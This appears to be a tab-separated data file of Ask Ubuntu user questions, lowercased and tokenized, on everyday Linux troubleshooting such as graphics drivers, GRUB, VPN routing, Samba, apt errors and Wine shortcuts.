412086	create wine-comaptible desktop files with optional file argument	i 'm using ms office 2007 via wine/pol and i 've made the desktop files for them like that : for starting : [ desktop entry ] encoding=utf-8 name=word 2007 genericname=game comment=playonlinux type=application exec=/usr/share/playonlinux/playonlinux -- run `` microsoft word 2007 '' icon=/home/sebastian/.playonlinux//icones/full_size/word 2007 categories=office ; for file opening : ( z : is the wine link to / ) [ desktop entry ] encoding=utf-8 name=mit word 2007 รถffnen genericname=game comment=playonlinux type=application exec=/usr/share/playonlinux/playonlinux -- run `` microsoft word 2007 '' z : % f icon=/home/sebastian/.playonlinux//icones/full_size/word 2007 categories=office ; however , the file opening shortcut does n't accept files with spaces ( they get replaced by % 20 ) . now i want to merge those two files into one , which should start word and , if supplied , opens a document , which may contain spaces . how do i accomplish that ?
412089	software for polar-coordinate plots	i 'm looking for easy software which can create 3d plot with polar coordinates ( cylindrical coordinates ) from a csv file ( or pasted from eg . libre office ) . making a trend-surface or sth like it would be useful too . i want also to have only 90 degree view .
412091	permission denied when excute a script ?	i run this script ./make.py and it shows error `` bash : ./make.py : permission denied '' how to solve this ?
412099	3d window effect is disabled in compizconfig setting manager ?	how to enable it ? i 'm using ubuntu 13.04 .
412101	charge network manager	i have an 3g modem and it on ubuntu does n't work for my operator , the default settings does n't exist and if i set it manually it does n't connect . i have tried debian and if i make some actions ( step by step ) it connect . can i replace the network manager from ubuntu with network manager from debian ? exist another network manager for connect 3g modems ( excluding : sakis3g , wvdial , mobile partner ) ? ps : i do n't want to use debian , i like unity interface and do n't charge it with gnome .
412104	boot xfce on ubuntu mini remix	i 've been trying to use ubuntu builder to make a custom xfce desktop , but every time i build the iso it boots to a console . do i need to install some sort of desktop manager or boot loader ?
412106	upgrade ubuntu and also install layer of gui on it ( on server version )	i have ubuntu 10.04 and i want to upgrade it to 12.04 . what do i do ? i know from my friend that ubuntu 10.04 server has been outdated , but i have only the 10.04 cd.i also got to know that the server versions do n't have a gui , so i wanted help . is it okay to use 12.04 server version ? i mean it is n't outdated yet right ? i also want to know how i can install a layer of gui on it ( because i have server version )
412112	how do i `` shutdown '' juju without losing data ?	i am running juju on my local box using the local provider ( lxc ) . i 've 3 machines at the moment . since this is probably using resources and i need it occasionally , i would like to shut it down ( without losing my data or any other state ) and restart ( bootstrap ? ) it from the command line . however , i ca n't find a way to just shut down all machines without losing the setup and the data . is there a way to shut it down and restart it from command line ?
412117	eth1 not active on reboot	i have eth0 and eth1 running fine - but on reboot , eth1 is not active . another reboot or two and it will come back . what script can i run on start up ( automatically , not go into terminal manually ) so that eth1 is always started on reboot ? better clarification here . is there a 'watchdog ' type script where it will monitor eth1 and if it sees it is not active , the watchdog would automatically run sudo ifdown eth1 and then sudo ifup eth1 i ca n't find any such watchdog type of program/script - any assistance would be appreciated .
412118	display list of most used commands	the command history will display the list of commands i used before . now : how could i know the most used commands ? also how to count number of times i used each command ? for example : if i use sudo 30 times in first day and 45 times in second day , then when displying the most used commands then sudo will be shown with number 75
412123	is there a way to still use checkgmail on ubuntu 13.10 ?	checkgmail is still for me the best gmail notifier . it allows to archive , delete , ... directly from the popup , it is small and do n't use much brandwidth . i use it in my debian xfce desktop but i 'm looking a way to use it also on ubuntu . however , unity ( since ubuntu 13.04 ) does not allow to display the checkgmail icon at the hot right corner of the screen . i 'm wondering if there are still checkgmail users in the ubuntu community and , if yes , how they use checkgmail with new versions if ubuntu ?
412124	pdfill editor issue with editable/fillable form previously created in word	pdf document needing to remain in adobe 9.5 not allowing editing/filling with pdfill editor after purchase & converted it from original word form ? have tried almost everything i can find or think of . any additional ideas for a fix ?
412125	create access point on ubuntu 13.10 ( macbook pro 5,5 )	i was wondering how to create a wireless network with my macbook ( 5,5 , 2009 ) using ubuntu ( 13.10 ) . i got that tutorial , that use ap-hotspot : http : //www.webupd8.org/2013/06/how-to-set-up-wireless-hotspot-access.html the problem is that my wireless card does n't support it , at least is that what i got on command line . this is strange , because in mac os i 'm able to create an access point . anyone know if i have to make something different to enable ap mode in ubuntu ? thanks
412130	installation help - ubuntustudio 12.04.3 amd64 - blank screen while installation	i just downloaded ubuntustudio-12.04.3-dvd-amd64.iso and burned it to dvd , trying to install on my pc with the below configuration : # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # amd atholon ( tm ) 64 x2 dual core processor 4200+ 2.21 ghz . 4gb of ram and gigabyte ga-m51gm-52g mother board . samsung syncmaster 740 lcd monitor # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # after booting with dvd it asked question on language [ i choose ; english ] and then it asked for try/install . i opted for installation , then after ubuntu studio welcome screen ( rotating message : made for humans ) screen goes blank and system hangs with no activity on dvd drive led or hdd . how do i install ubuntu studio 12.04.3 lts 64 bit on my machine . some history on this machine : i previously used ubuntu studio 12.04.03 32 bit ( i386 ) version . it was working fine , but for reasons of android development i removed and installed ubuntu 64 bit 12.04.03 , with this version if i keep updates online while installing , then i am into screen resolution issues , if uncheck and install then its working fine . ( i thought upgraded graphics drivers might be causing a problem ) without update online it went well , but later i wanted audio and video , so tried ubuntu studio 12.04.03 lts amd64.iso . now i am facing this issue . please help me out !
412133	false installation process and i cant even get on bios !	i guess i had set the primary or secondary boot device wrongly ! my laptop is a sony vaio t serie and has a win 8.1 . i have download the ubuntu 10.13 from the website and instead of burn it on a dvd or cd , made a usb-stick boot device . i got into bios and disabled the secure boot since it could n't start the booting by itself at restart . after getting to ubuntu installation shield , it could n't recognized a place to install . i faced some errors and just could force shut-down by pressing and holding the power key ! now ! ! ! ! i ca n't install ubuntu ... cant get on my bios ... f8 does n't work and when put the usb-stick out and restard my laptop it just says : operating system not found ... only thing that work now is to sick on usb and selecting `` try ubuntu without installation '' ... anyone who knows how to fix this ? thank you
412134	xubuntu 13.10 - ati driver ( beta ) - xorg uses 100 % cpu	using xubuntu 13.10 , x.org x server 1.14.5 and the lastest ati drivers for my dual r9 270 setup . after some time ( a few hours ) xorg starts to use 100 % of one core ( quad core intel cpu ) , the system becomes unstable and then stops . does anyone know of any patches or a fix for this situation ? i 've found this on reddit : this is because of an interrupt storm . this has been a problem with amd drivers for over a year , and they have still not fixed it . the only fix if you experience this seems to go back to the 12.8 drivers , which is not humanely possible on linux distros that ship a semi-recent version of all the xorg software . ( it 's possible , but not worth it at all . ) i had the same problem with later drivers on windows and linux . one last fix you can try is setting the affinity of the irq daemon to one core/thread , and limit bfg/cgminer to that core/thread too . i do n't know what how to achieve the last suggestion .
412135	jockey nvidia driver update fails	i 've got nvidia graphics and kubuntu 12.04 system . i 've got 173 version of the driver installed currently and i try to install a newer driver ( version 331 or 319 ) . the beginning goes smoothly : 2014-01-28 16:43:46,588 debug : install progress nvidia-331-updates 80.000000 2014-01-28 16:43:46,695 debug : install progress nvidia-319-updates 80.000000 2014-01-28 16:43:46,763 debug : install progress nvidia-319-updates 90.000000 2014-01-28 16:43:46,831 debug : install progress nvidia-319-updates 100.000000 2014-01-28 16:43:49,338 debug : selecting previously unselected package nvidia-331-updates . ( reading database ... 225012 files and directories currently installed . ) unpacking nvidia-331-updates ( from ... /nvidia-331-updates_331.20-0ubuntu0.0.1_i386.deb ) ... selecting previously unselected package nvidia-319-updates . unpacking nvidia-319-updates ( from ... /nvidia-319-updates_331.20-0ubuntu0.0.1_i386.deb ) ... processing triggers for man-db ... setting up nvidia-331-updates ( 331.20-0ubuntu0.0.1 ) ... info : enable nvidia-331-updates debug : parsing /usr/share/nvidia-common/quirks/dell_latitude debug : parsing /usr/share/nvidia-common/quirks/lenovo_thinkpad debug : parsing /usr/share/nvidia-common/quirks/put_your_quirks_here loading new nvidia-331-updates-331.20 dkms files ... first installation : checking all kernels ... building only for 3.2.0-58-generic-pae building for architecture i686 building initial module for 3.2.0-58-generic-pae done . nvidia_331_updates : running module version sanity check . - original module - no original module exists within this kernel - installation - installing to /lib/modules/3.2.0-58-generic-pae/updates/dkms/ depmod ... . dkms : install completed . setting up nvidia-319-updates ( 331.20-0ubuntu0.0.1 ) ... but eventually it fails all the time . /var/log/jockey.log contains the following ( it 's just the beginning ) : 2014-01-28 16:43:49,619 warning : modinfo for module nvidia_319_updates failed : error : modinfo : could not find module nvidia_319_updates 2014-01-28 16:43:49,619 error : xorgdriverhandler.enable ( ) : package or module not installed , aborting 2014-01-28 16:43:49,627 error : xorg : nvidia_319_updates : get_alternative_by_name ( nvidia-319-updates ) returned nothing 2014-01-28 16:43:49,714 debug : nvidia ( nvidia_319_updates ) .enabled ( ) : target_alt none current_alt /usr/lib/nvidia-173/ld.so.conf other target alt none other current alt /usr/lib/nvidia-173/alt_ld.so.conf 2014-01-28 16:43:49,715 debug : nvidia_319_updates is not the alternative in use 2014-01-28 16:43:49,745 debug : nvidia ( nvidia_319_updates ) .enabled ( ) : target_alt none current_alt /usr/lib/nvidia-173/ld.so.conf other target alt none other current alt /usr/lib/nvidia-173/alt_ld.so.conf 2014-01-28 16:43:49,745 debug : nvidia_319_updates is not the alternative in use 2014-01-28 16:43:55,091 debug : nvidia ( nvidia_173 ) .enabled ( ) : target_alt /usr/lib/nvidia-173/ld.so.conf current_alt /usr/lib/nvidia-173/ld.so.conf other target alt /usr/lib/nvidia-173/alt_ld.so.conf other current alt /usr/lib/nvidia-173/alt_ld.so.conf does anybody know what 's going wrong ?
412140	updating grub error	just ran updates for my server , and grub failed to update correctly . the error said : grub failed to install to the following devices : /dev/dm-0 do you want to continue anyway ? if you do , your computer may not start up properly . writing grub to boot device failed - continue ? '' i selected no when prompted to continue anyway , then was prompted to select the devices i 'd like grub-install to automatically run for ... the options i was given were ... [ ] /dev/sda ( 34359 mb ; virtual_disk ) [ ] - /dev/sda1 ( 254 mb ; /boot ) [ * ] /dev/dm-0 ( 31952 mb ; bs -- ubuntu-root ) wondering which dev i should select ? i had problems updating grub before , and could n't get the machine to start . took me hours to fix , want to avoid that this time around ... thanks !
412141	uninstall nouveau	how to completely remove nouveau to install the driver nvidia ? i tried to install the nvidia driver as on ubuntu wiki but to no avail . all writes exactly what nouveau is . tried to add to the blacklist and reboot and nothing too . tried apt-remove command writes that it is not present .
412142	permission denied to view a folder . i copied a file from one folder to the current folder	i am new user of ubuntu . i have installed ubuntu version 12.10 in virtual box . the problem . i downloaded a file called pcre in to /home/downloads . i created a folder in pcre in home folder and moved the pcre file from download folder to pcre folder i then copied the folder /home/dinesh/pcre to /usr/local/src/snort/snorttmp using the command cp -a /home/dinesh/pcre /usr/local/src/snort/snorttmp when i am trying to access snorttmp folder , a message is displayed '' the folder contents could not be displayed . you do not have the permissions necessary to view the contents of `` snorttmp '' . before copying pcre file into the snorttmp , i had access to snorttmp and was able to view the files present in snorttmp folder . i then tried to see my files through the terminal root @ dinesh-virtualbox : /usr/local/src/snort/snorttmp # ls -l -rw-r -- r -- 1 root root 5189146 jan 24 00:18 2787 -rw-r -- r -- 1 root root 19659 jan 28 16:29 index.html drwxrwxr-x 2 dinesh dinesh 4096 jan 28 20:18 pcre drwxr-xr-x 10 root root 4096 jan 1 00:08 snort-2.9.6.0 drwxrwxr-x 6 dinesh dinesh 4096 jan 28 20:20 snortrules drwxr-xr-x 2 root root 4096 jan 28 16:18 snorttmp i find few of the files are marked in blue while the other files are displayed in white . the files that were displayed in blue when i did ls -l are pcre snort-2.9.6.0 snortrules snorttmp 2787 and index.html are displayed in white . kindly let me know what should be done to get permission to view my files . thanks ,
412143	forgotten password ext . hdd	i found an old hard drive on which i once had some version of linux installed . do n't remember which . when i mount it i can mount a 255mb filesystem folder but the rest of the drive is encrypted . i have no recollection of my password . can anyone help me if there is a way to work around it ? i am using osx mavericks as primary and ubuntu as secondary os . any help would be appreciated . love from dk
412145	how to show the login screen instead of the lock screen ?	i want ctrl+alt+l and being idle to trigger dm-tool switch-to-greeter ( goes to login screen ) instead of lock screen i intend to replace every event where lockscreen would appear to show login screen ( but still logged in ) how do i do it ?
412150	ca n't run php script accessing my mysql databse	i 've created lamp server in my ubuntu desktop . i 've also made a sample database in mysql having 6 columns . i can access it through the terminal . i 've also created a php script for accessing the same . but when i 'm not able to run it in the web browser ... . it just shows me a blank page ... .and nothing else ! ! ! ! below is my code : // i 'd typed http : //_my_ip_address_/_file_name_.php in the browser to run this file < ? php include ( 'db_login.php ' ) ; // include the login info of the user $ connection = mysql_connect ( $ db_host , $ db_username , $ db_password ) ; // make the connection if ( ! $ connection ) { die ( `` could n't connect to the database : < br / > '' , mysql_error ( ) ) ; } $ db_select = mysql_select_db ( $ db_database ) ; // select the database if ( ! $ db_select ) { die ( `` could n't select the database : < br / > '' , mysql_error ( ) ) ; } // developing the query $ select = 'select ' ; $ coloumn = ' * ' ; $ from = 'from ' ; $ table = 'table ' ; $ query = $ select. $ coloumn. $ from. $ table ; $ result = mysql_query ( $ query ) ; if ( ! $ query ) { die ( `` could n't query the database : < br / > '' , mysql_error ( ) ) ; } // fetching and displaying the result while ( $ result_row = mysql_fetch_row ( $ result ) ) { echo `` a '' . $ result_row [ 1 ] . `` < br / > '' ; echo `` b '' . $ result_row [ 2 ] . `` < br / > '' ; echo `` c '' . $ result_row [ 3 ] . `` < br / > '' ; echo `` d '' . $ result_row [ 4 ] . `` < br / > '' ; echo `` e '' . $ result_row [ 5 ] . `` < br / > '' ; echo `` f '' . $ result_row [ 6 ] . `` < br / > < br / > '' ; } mysql_close ( $ connection ) ; // closing the connection ? >
412152	how can i save this configuration permanently ?	sudo iptables -t nat -a postrouting -s 10.10.0.0/16 -o eth0 -j masquerade
412159	ask for ubuntu os	i would like to kindly request please provide the ubuntu os to us . if you send it i can install it in 85 schools and in our office . installation of this software will benefit over 3000 persons . i hope your will send positive replay best regard ,
412160	how do i activate ssl as a 'mutt ' user ?	my provider says i have to activate ssl in order to ( continue to ) be able to read my mail . i use 'mutt ' , and i have n't been able to find out how to do this ( activate ssl ) . the provider was unable to tell me . do i have to add something to .muttrc ? ( i have a pop account and use fetchmail . ) g.heinlein
412161	how can i wake-on-lan mulitple ( wol ) clients at once ?	i have been searching for a way to wake-on-lan ( wol ) multiple clients in a computer lab or for the purpose of disk imaging . i am using lubuntu 12.04 as the server . what is the simplest and/or best command-line tool ( s ) for this job ?
412165	can not install .run executable	./mercurystandalone-3.3-linux-installer.run nothing happened at all double click the executable in file manager it let me choose the default program to run in properties i already checked the option allow executing file as program the other command i tried : uname -a linux ubuntu 3.8.0-34-generic # 49~precise1-ubuntu smp wed nov 13 18:05:00 utc 2013 x86_64 x86_64 x86_64 gnu/linux file ./mercurystandalone-3.3-linux-installer.run ./mercurystandalone-3.3-linux-installer.run : elf 32-bit lsb executable , intel 80386 , version 1 ( gnu/linux ) , statically linked , stripped ldd mercurystandalone-3.3-linux-installer.run not a dynamic executable sudo sh ./mercurystandalone-3.1-linux-installer.run [ sudo ] password for xxx : ./mercurystandalone-3.1-linux-installer.run : 1 : ./mercurystandalone-3.1-linux-installer.run : syntax error : `` ( `` unexpected ls -l -rwxrwx -- x 1 xxx xxx 142824167 jan 28 10:58 mercurystandalone-3.1-linux-installer.run please help me install this program . thanks in advance !
412167	sybase 15.7 , installation problem - java related	when i run ./setup.bin , for installing sybase 15.7 , i get the following error , /tmp/install.dir.3118/linux/resource/jre/bin/java : 1 : /tmp/install.dir.3118/linux/resource/jre/bin/java : syntax error : end of file unexpected ( expecting `` ) '' ) i did install the relevant lib files as listed in the installation document . but , still the above error keeps blocking the installation process .
412168	wrong display and frozen installation	my computer is hp pavilion dv2000.there 's a win7 os in my hard disk before.i followed steps in internet to install ubuntu from a image in my hd ( 0,6 ) .things seem to be right before i found that installation guide becomes frozen with text `` searching file system '' . ( hours have passed ) .at the same time my screen becomes strange and displays wrong windows at wrong position . what should i do ? should i continue waiting , or just reboot the computer ?
412171	escale plugin and workspaces in ubuntu 13.10	first of all i ' m not english so i ' ll try do my best to explain myself . thanks in advance ! ! : ) i 'm moving from ubuntu 12.04 , today i 've installed ( fresh install ) ubuntu 13.10 . in ubuntu 13.10 when i set a hot corner ( escale plugin ) to show open apps it shows me all open apps independently the workspace they are . in ubuntu 12.04 was different , if i was in `` workspace 1 '' the hot corner only showed the apps working in this area . and if i was in `` workspace 2 '' the hot corner showed the apps running there . and the same for the other workspaces . i do n't know why this happens , i 'll really apreciate if someone could explain me ... i 'm really confused ! ! thank you so much and very best regards ! ! : d
412174	does `` switch account '' in ubuntu 13.04 logs out the first account upon switching ?	i have 2 accounts set up on my laptop running 13.04 . when i click the gear icon and select lock/switch account and log into the second account , upon returning the the first account i noticed that i had a new session . all of my running applications were gone . is this expected behavior ? i would prefer to have the applications left in a running state so that when the second account is done , i can return to where i was . any thoughts on this ?
412176	qt 4 update , removing lots of libs	i get a message from muon update module aksing to update qt 4 . thats fine , but it also want to remove lots of libs and programs ( incl spotify , ksystemlog , krdc , krfb , kdepim-runtim , userconfig and many others that look important for my system ( kubuntu 12.04 ) to function . is it ok to let muon remove all those packages ? ?
412178	how to install pip for python 3 in ubuntu 12.04 lts	i am trying to install the pillow module for python 3.3 , but for that i need to install pip . every time that i install pip it installs for python 2.7 , any help ?
412181	'nvidia-settings ' received an x window system error ( error was 'badvalue ( integer parameter out of range for operation ) ' . )	since the last apt-get dist-upgrade this morning , i 've started seeing nvidia-settings crashes when i try setting something with the error below : $ the program 'nvidia-settings ' received an x window system error . this probably reflects a bug in the program . the error was 'badvalue ( integer parameter out of range for operation ) ' . ( details : serial 666 error_code 2 request_code 139 minor_code 25 ) ( note to programmers : normally , x errors are reported asynchronously ; that is , you will receive the error a while after causing it . to debug your program , run it with the -- sync command line option to change this behavior . you can then get a meaningful backtrace from your debugger if you break on the gdk_x_error ( ) function . ) having spent a few hours already i 've tried several things below and no luck : rename ~/.nvidia-settings-rc -- > new file was made at some point i 'm not sure . rename /etc/x11/xorg.conf -- > new file has n't been generated . install bumblebee -- > had same situation with this ticket and gave up . uninstalled . tried installing and/or removing nvidia 's libraries ( versions tried : 304 , 319 , 331 afai remember ) since it looks like the latest nvidia driver 331.20 was just released early this morning , i suspect the newly installed library contains a wrongdoer . but does anyone have an idea to fix this ? system logs : $ cat /etc/issue ubuntu 12.04.4 lts \n \l $ uname -a linux 130s-serval 3.2.0-58-generic # 88-ubuntu smp tue dec 3 17:37:58 utc 2013 x86_64 x86_64 x86_64 gnu/linux $ for keyword in baseboard-manufacturer baseboard-product-name baseboard-version system-manufacturer system-product-name system-version bios-vendor bios-version bios-release-date ; done > printf `` % -22s : `` `` $ keyword '' ; > sudo dmidecode -s `` $ keyword '' ; > done system76 , inc. baseboard-product-name : serval professional baseboard-version : serp7 system-manufacturer : system76 , inc. system-product-name : serval professional system-version : serp7 bios-vendor : american megatrends inc. bios-version : 4.6.4 bios-release-date : 06/01/2011 $ dpkg -p nvidia-settings |grep version version : 331.20-0ubuntu0.0.1 thanks !
412185	multimedia keyboard recognition delayed	several years ago ich changed my original ( fujitsu-siemens ) keyboard for a nice thing called colorsit kb 8110 . for i changed every hardware but the dvd-burner and a multicard-reader , including mainboard , graphics card , processor , usb cards , hdd , sdd and so on , and my following problem remained , it seems to be useless to name the hardware configuration . the problem shows up under ubuntu 10.04 as well as under 12.04 . it happens under gdm an lightdm as well as under bloody unity - of course , because they are startet after . the only common seems to be the x11 . the keyboard is recognized by bios and linux - but in linux with a delay between 0 , seconds , minutes and eternity while showing the login screen . after it 's been found , it works fine including all multimedia keys . it ist also unpredictable , what time it will take next , independent on shutdown , restart or change to another installation . it seems to take the linux system some time to find the appropriate driver and not to remember it . is it possible to read out the right one and tell linux to look for it first ?
412186	upgrading ubuntu from 13.04 to 13.10	how do i go about installing ubunbu 13.10 ? i have downloaded the distribution already , after acquiring an ebay computer with ubuntu 13.04 pre-installed . please can anyone instruct me ?
412188	install ubuntu next to windows 7 with a 3rd partition	i would like to install ubuntu next to windows 7 . i 've got a 256gb ssd in my laptop and i would like to create three 'main ' partitions : about 50gb for the ubuntu system about 50gb for the windows system about 150gb for my files to be accessible from both systems . how do i create these partitions when installing ubuntu 12.04 lts ? which file-systems do i need to choose so that the large partition is accessible for both operating systems ? thanks for your help in advance jurg
412190	`` windows installer ubuntu '' from windows 8/8.1	there was an easy `` windows installer '' that i remember using several times long time ago . i almost sure there is not a `` windows installer '' for windows 8 . is there a way to create the project or see the status if the project has already started ?
412193	blurred screen during install	i bought new ultrabook dell xps 13 . during install ubuntu 13.10 i have very blurred screen : https : //docs.google.com/file/d/0b2mfeijafde0vmnuvtfpaxctuda what can i do ? piotr
412195	upgrade 12.04 to 12.10	last night upgraded my notebook from 12.04 lts to 12.10 , restarted and after that ... just a blank screen . any ideas ? rebooted several times , starts grub , the ubuntu screen loading system and then a blank screen and nothing happens .
412198	duplicate chromium repository removal	somehow i added this repository someone suggested to install chromium ( i am a new user ) and now every time i update it shows this : w : failed to fetch http : //ppa.launchpad.net/a-v-shkop/chromium/ubuntu/dists/saucy/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/a-v-shkop/chromium/ubuntu/dists/saucy/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . how do i remove that repository ?
412208	gnuplot : how to set grid as cylindrical grid	is that possible to set cylindrical grid ( polar grid + z in the 3rd dimension ) ? or i have to draw it manually ( how ? )
412209	list of gnu binutils	how can i get such a list from command line , including the version of each utility ? are they by default in the same file by any chance ?
412210	/etc/crypttab timout option	i have created an encrypted flash drive named 'luksflash ' . i have tested with the following : $ sudo cryptdisks_start luksflash /dev/mapper/luksflash now exists $ sudo cryptdisks_stop luksflash /dev/mapper/luksflash now gone . all works as expected so far . here 's the entry in /etc/crypttab : luksflash uuid=6f86be79-723d-4ce5-9ce1-047960b649c1 none luks , timeout=10 the issue : when booting the system with flash drive plugged in , i get a prompt to enter password . however the prompt dissapears so quickly it does not give me time to actually enter in a password . i have used the 'timout ' option in crypttab however that option seems to be ignored at bootup . before anyone asks : yes , i do want to be prompted for a password and do not want to use a key . 12.04 lts thanks in advance for any advice .
412213	running ubuntu on hp compaq presario cq58 amd e-300 1.3ghz 4gb ram 320gb hd	is anyone out there running ubuntu on hp compaq presario cq58 notebook pc ? if so what version and are there any issues i need to know about ? can i dual boot with windows 8 currently running ? laptop specs : compaq presario cq58 notebook pc amd e-300 1.3 ghz 4gb ram 320gb hd thanks ,
412216	samba problem -- is it a firewall issue ?	i have just installed ubuntu 13.10 on a computer i use as archive for other machines . i need samba working from various windows 7 machines . i have confirmed that smbd and nmbd are both working , and the shares i need are set up correctly . however , i ca n't use net use ... command from a windows box to connect to the ubuntu machine . it would appear like a firewall issue on ubuntu ( i can get to other windows machines on the system , so i 'm pretty sure the issue is n't on the windows side ) . how can i check the firewall settings ?
412219	connected to vpn but still same ip	i am trying to setup a vpn connection on my machine , ubuntu 12.04 . the steps i did are the following : sudo pptpsetup -- create myvpn -- server 123.123.123.123 -- username vpnuser -- encrypt sudo pon myvpn after entering my password , i am succesfully connected to the vpn i guess : the output of /var/log/syslog : jan 28 13:23:11 mypc pppd [ 4368 ] : chap authentication succeeded jan 28 13:23:11 mypc pppd [ 4368 ] : mppe 128-bit stateless compression enabled jan 28 13:23:11 mypc pppd [ 4368 ] : local ip address 172.20.x.x jan 28 13:23:11 mypc pppd [ 4368 ] : remote ip address 81.171.x.x this is my ifconfig output : ppp0 link encap : point-to-point protocol inet addr:172.20.x.x p-t-p:81.171.x.x mask:255.255.255.255 up pointopoint running noarp multicast mtu:1392 metric:1 rx packets:6 errors:0 dropped:0 overruns:0 frame:0 tx packets:6 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:3 rx bytes:60 ( 60.0 b ) tx bytes:66 ( 66.0 b ) wlan0 link encap : ethernet hwaddr 9c:4e:36:43 : c8:8c inet addr:192.168.x.x bcast:192.168.x.x mask:255.255.255.0 inet6 addr : fe80 : :9e4e:36ff : fe43 : c88c/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:23031 errors:0 dropped:0 overruns:0 frame:0 tx packets:15034 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:24204707 ( 24.2 mb ) tx bytes:1892375 ( 1.8 mb ) so i guess at this point it all went well , but i still have the ip of my wireless network . i think i am missing the to route all the traffic through the vpn right ?
412221	make ad users look like local user	i have just connected my ubuntu computer to my company 's windows active directory and everything is working fine . what i want to do is .. if i create a shortcut or install certain programs and leave it on the launcher , how can i make this effect all other users who log into the same pc ?
412222	apt-get not working on ubuntu vps	i could n't install any software using apt-get command in my vps and the terminal prints : root @ ubuntu : ~ # apt-get install python3 reading package lists ... done building dependency tree reading state information ... done package python3 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'python3 ' has no installation candidate what 's the problem ? i 've tried apt-get update as root user and here is what is shown to me : root @ ubuntu : ~ # apt-get update err http : //security.ubuntu.com precise-security release.gpg temporary failure resolving 'security.ubuntu.com' err http : //us.archive.ubuntu.com precise release.gpg temporary failure resolving 'us.archive.ubuntu.com' err http : //us.archive.ubuntu.com precise-updates release.gpg temporary failure resolving 'us.archive.ubuntu.com' err http : //us.archive.ubuntu.com precise-backports release.gpg temporary failure resolving 'us.archive.ubuntu.com' reading package lists ... done w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/release.gpg temporary failure resolving 'us.archive.ubuntu.com' w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/release.gpg temporary failure resolving 'us.archive.ubuntu.com' w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-backports/release.gpg temporary failure resolving 'us.archive.ubuntu.com' w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/precise-security/release.gpg temporary failure resolving 'security.ubuntu.com' w : some index files failed to download . they have been ignored , or old ones used instead . root @ ubuntu : ~ # and my vps place is in the germany . does it matter ?
412223	gnome applications wont start in fluxbox desktop in ubuntu 13.10	i have been using fluxbox the lightweight window manager and desktop environment instead of unity for a while since my opengl applications need all the gpu juice they can get . since upgrading to 13.10 , i can not start any gnome applications inside fluxbox . they all fail with the message complaining about libatk-bridge-2.0.so.0 from /usr/lib/x86_64-linux-gnu hari @ hari-precision-workstation-t7500 : ~ $ gedit gedit : symbol lookup error : /usr/lib/x86_64-linux-gnu/libatk-bridge-2.0.so.0 : undefined symbol : atk_text_get_string_at_offset i have all the atk components installed as shown here : hari @ hari-precision-workstation-t7500 : ~ $ dpkg -- list | grep `` atk '' ii gir1.2-atk-1.0 2.10.0-2 amd64 atk accessibility toolkit ( gobject introspection ) ii libatk-adaptor : amd64 2.10.2-1ubuntu1~saucy1 amd64 at-spi 2 toolkit bridge ii libatk-adaptor-data 2.10.0-1 all at-spi 2 toolkit bridge - transitional dummy package ii libatk-bridge2.0-0 : amd64 2.10.0-1 amd64 at-spi 2 toolkit bridge - shared library ii libatk1.0-0 : amd64 2.10.0-2 amd64 atk accessibility toolkit ii libatk1.0-0 : i386 2.10.0-2 i386 atk accessibility toolkit ii libatk1.0-data 2.10.0-2 all common files for the atk accessibility toolkit ii libatk1.0-dbg : amd64 2.10.0-2 amd64 atk libraries and debugging symbols ii libatk1.0-dev 2.10.0-2 amd64 development files for the atk accessibility toolkit ii libatkmm-1.6-1 : amd64 2.22.7-2 amd64 c++ wrappers for atk accessibility toolkit ( shared libraries ) please can someone tell me how i can get libatk compatability to allow fluxbox to launch gnome applications : which worked seamlessly till 13.04
412224	not booting from disc after initial tryout	i made a boot disc to try out ubuntu 12.04 ... it booted up fine , then i decided to reboot to xp and performed a check disc , and defragmentation prior to doing a partition with paragon software ... .just to be safe , before i did the partition , i tried to reboot with the ubuntu disc , and just stuck on the purple screen with the ubuntu and red/white dots moving . what did i do wrong , and how do i correct it ? i tried twice ... same results .
412225	removing windows from the same partition as ubuntu	okay so i installed ubuntu with wubi , and now ubuntu and windows vista is on the same partition ? ? i want to remove windows from the partition , or create a new partition and put ubuntu there and remove the windows one , but how can i do that ?
412227	error while running a topcons script	after installing topcons successfully , when i try to run the script , it gives me an error : directory /home/robber/bin/../var/www/topcons.cbr.su.se/docroot/topcons/ does not exist however , the directory exists and is in path too . i installed the tool in local bin . i have got share , var and www folder created . i am unable to fix this issue .
412228	ca n't configure physical power button to sleep ? `` battery monitor settings '' gui claims it already is	i ca n't configure my laptop to sleep when i press the physical power button . i chose that option in the `` battery monitor settings '' gui ( for all power states ) , but it still turns off whenever i press it . the sleep option in the kickstarter menu works fine , though . ( i also chose the `` do nothing '' option for when i close the lid . this works fine , so it 's not like everything in the gui is just not having an effect ... )
412230	how do i bind my internal ip to my external ip with dhcp ?	i am making a minecraft a minecraft server , i have forwarded the port 25565 and have done everything necessary for it to work , with a functioning dns that updates from the external ip every 5 minutes . but it does n't work ; when i start the minecraft server it works but only on the local network . it 's not reaching outside the network . how do i use iptables to make this work ? i have forwarded my servers ' internal ip and i tested on a website to see if it can listen on the ports 25565 . it was successful but i am not sure why it wo n't work ? i 've heard of postrouting having something to do with this ? what iptables commands should i use ? thanks !
412232	how to recover user data missing after reset of computer	i was trying to figure out how watch 4od ( as like many people it just loads forever and never actually plays anything ) so i used the help on this page : 4od ( uk ) - ca n't stream i started with this : close all browser windows and then : remove the adobe cache : rm ~/.adobe -rf but terminal said it could n't remove this as it was busy . everything was closed so i thought if i reset my computer it would stop this program being in use and allow me to continue the process . however when i logged on again everything was gone ! music , documents , downloads etc . ( i am definitely signed into the correct user ) . is there anyway i can reset my computer to an hour ago or something to reverse this ? i honestly do n't understand how i did this !
